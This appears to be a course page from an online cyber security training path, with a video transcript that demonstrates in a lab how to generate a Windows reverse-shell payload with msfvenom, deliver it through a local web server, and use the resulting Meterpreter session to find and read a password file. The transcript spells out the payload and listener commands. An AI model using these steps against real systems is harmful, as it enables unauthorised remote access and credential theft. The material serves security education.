1. Home
  2. Training Library
  3. 3. Weaponisation

How To: Windows App Malware

Developed with
QA

Contents

keyboard_tab
Cyber Primer Online Learning
1
Weaponisation
PREVIEW15m 14s

The course is part of this learning path

Cyber Primer
course-steps 5 description 1
play-arrow
How To: Windows App Malware
Overview
DifficultyBeginner
Duration24m
Students7

Description

Course Description 

This module will look at weaponisation, or how hacking exploits can be created and disguised. The software simulations will cover the creation of mobile and desktop payloads.  

  • Weaponisation 
  • Obfuscation 
  • Encryption 
  • Ciphers 
  • Desktop Malware 
  • Mobile Malware  
  • Windows App Malware Creation  
  • Mobile Malware Creation  

 

Intended Audience  

Although perceived as an IT issue, cyber security is, in fact, a subject relevant to all business units. Cyber Primer is aimed at anyone with an interest in cyber security, whether they are looking to pursue a career as a penetration tester, or just want to get a feel for the world of cyber security.  

 

Prerequisites of the Certifications 

There are no prerequisites for this course, however, participants are expected to have a basic understanding of computers and the internet. 

 

Feedback 

We welcome all feedback and suggestions - please contact us at qa.elearningadmin@qa.com to let us know what you think. 

Transcript

The Windows operating system is the most widely used computer operating system used on personal computers. In this video you're going to see how we can create a payload to launch on a Windows application to exfiltrate information for a victim machine. To create a Windows app payload we're going to need to have a Kali Linux image open. I'm using my VirtualBox image and I've already got my image launched. We're going to use the Metasploit framework pre-installed in Kali to generate the payload for us to use. Metasploit is a database full of vulnerabilities and payloads and is regularly updated with recently found vulnerabilities for penetration testers and security professionals to test out. Select the terminal and type, msfconsole -r. I'm going to direct it to a handler called, handler.rc, which has the instructions to start a listener. You can find the handler I've used in the notes section of this video. The handler file contains the commands used to start the listener and can be viewed in a text editor. The listener is now running. Let's proceed to open another terminal. The shortcut for this is control, shift, T. This time we're going to create a payload. Type, msfvenom -p windows/meterpreter/reverse_tcp. We're going to specify that the local host, or LHOST equals 10.0.2.30. Now we're going to specify a local port, or LPORT equals 4444. Now we're going to specify what type of file we want to create with a -f flag. We want an executable, so we have typed exe and provided an output file name, win_payload.exe. Pressing enter will go ahead and create that payload for us now. There's our file in the home folder. Now we must get a web server running, so we're going to type, python -m SimpleHTTPServer. I'm going to put it on port 80, the HTT port. Now I have the server running. I'm now switching back over to a Windows system that is also running on VirtualBox. I've opened up Internet Explorer and now I'm going to navigate to the web browser, or the web server that we just created. 10.0.2.30. You can see it sharing all the files that we have available, but the file we're looking for is right down at the bottom. win_payload.exe. Let's click the file and run it. Now we can switch back over to Kali and you will see that there is traffic on both your web server, but most importantly, Kali. We have a Meterpreter session and our payload has initiated a reverse TCP handling session using the instructions specified. We have a number of things that we can do from here to begin to investigate the machine, but what we will do is we'll do a search for a file, any file that may have passwords in it. We can use the search function by adding asterisks around our keyword to allow for other surrounding text in the file name. Pressing enter will now search in the external file system on its reverse session to find any files that match our terms. We have one result. What we can do now is we can concatenate, or cat that file to our screen, now the commands are slightly different here. Even though we have the actual directory, we use double backslashes when addressing the external machine. Press enter on that command and what we should see is the content of the file itself displayed in the screen. Here it is showing to us that the file reads, in here passwords are hiding, smiley face. Obviously real passwords hiding in a target, or other possible information that any particular hacker might want to exfiltrate and use even for another part of a network attack might be a bit more difficult to find, but this is the basics of using an application to launch an attack. Here is the help. Here are the commands for Meterpreter sessions, information about audio controls, grabbing tokens, stealing password databases and dumping, et cetera. Meterpreter sessions are powerful, so investigate the help section and learn the commands.

About the Author

Students32
Courses5
Learning paths1

Originating from a systems administration/network architecture career, a solid part of his career building networks for educational institutes. With security being a mainstay his implementation he grew a strong passion for everything cyber orientated especially social engineering. The educational experience led to him mentoring young women in IT, helping them to begin a cyber career. He is a recipient of the Cisco global cyber security scholarship. A CCNA Cyber Ops holder and elected for the CCNP Cyber Ops program.